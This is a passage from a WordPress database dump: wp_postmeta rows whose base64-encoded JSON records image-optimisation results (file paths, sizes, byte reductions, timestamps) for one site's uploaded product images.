x7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tNzY4eDc2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MjM5MywidGltZSI6MTQ4MzU3MzE0MiwiaWQiOjEzNDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMTYwMHgxNjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMTYwMHgxNjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTE2MDB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwNjA3LCJ0aW1lIjoxNDgzNTczMTQ3LCJpZCI6MTM0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUzNywidGltZSI6MTQ4MzU3MzE1MCwiaWQiOjEzNDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NTksInRpbWUiOjE0ODM1NzMxNTMsImlkIjoxMzQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDk0LCJ0aW1lIjoxNDgzNTczMTU3LCJpZCI6MTM0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyNjQsInRpbWUiOjE0ODM1NzMxNjAsImlkIjoxMzQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjozODgsInRpbWUiOjE0ODM1NzMxNjQsImlkIjoxMzQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MDAsInRpbWUiOjE0ODM1NzMxNjcsImlkIjoxMzQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0MDksInRpbWUiOjE0ODM1NzMxNzAsImlkIjoxMzQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0OTgsInRpbWUiOjE0ODM1NzMxNzQsImlkIjoxMzQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MzcsInRpbWUiOjE0ODM1NzMxNzcsImlkIjoxMzQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXN1cHJpb24tNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc3Vwcmlvbi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zdXByaW9uLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo2ODEsInRpbWUiOjE0ODM1NzMxODEsImlkIjoxMzQ3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29609, 1341, 'wpfc_optimisation_reduction', '35706'); 
INSERT INTO `wp_postmeta` VALUES (29610, 1341, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLmpwZyIsIndpZHRoIjo2MTAsImhlaWdodCI6Mjk0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLmpwZyIsInJlZHVjdGlvbiI6MzUwNzcsInRpbWUiOjE0ODM1NzMxODgsImlkIjoiMTM0MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTM0MHgyOTQuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoyOTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTM0MHgyOTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTM0MHgyOTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMTkwLCJpZCI6MTM0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMxOTIsImlkIjoxMzQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNTItMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzE5NCwiaWQiOjEzNDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMTk2LCJpZCI6MTM0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLTEtNTEweDI5NC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjI5NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLTEtNTEweDI5NC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLTEtNTEweDI5NC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMxOTgsImlkIjoxMzQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMTYsInRpbWUiOjE0ODM1NzMyMDAsImlkIjoxMzQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoyMTYsInRpbWUiOjE0ODM1NzMyMDMsImlkIjoxMzQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxODksInRpbWUiOjE0ODM1NzMyMDUsImlkIjoxMzQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTI0N3gyOTQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTI0N3gyOTQuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyOTQiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy01Mi0xLTI0N3gyOTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczMjA3LCJpZCI6MTM0MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItMS0zMDB4Mjk0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNTItMS0zMDB4Mjk0LmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMjk0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNTItMS0zMDB4Mjk0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzIwOSwiaWQiOjEzNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLTEtNDAweDI5NC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTUyLTEtNDAweDI5NC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjI5NCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTUyLTEtNDAweDI5NC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMyMTEsImlkIjoxMzQxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29611, 1339, 'wpfc_optimisation_reduction', '10493'); 
INSERT INTO `wp_postmeta` VALUES (29612, 1339, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXIuanBnIiwid2lkdGgiOjYwNTAsImhlaWdodCI6NDAzOCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3MzIxNiwiaWQiOiIxMzM5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jbGVhbmVyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NsZWFuZXItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MSwidGltZSI6MTQ4MzU3MzIyMCwiaWQiOjEzMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjo3NTAsInRpbWUiOjE0ODM1NzMyMjYsImlkIjoxMzM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItNzY4eDUxMy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jbGVhbmVyLTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY2xlYW5lci03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6Njk1LCJ0aW1lIjoxNDgzNTczMjI5LCJpZCI6MTMzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwM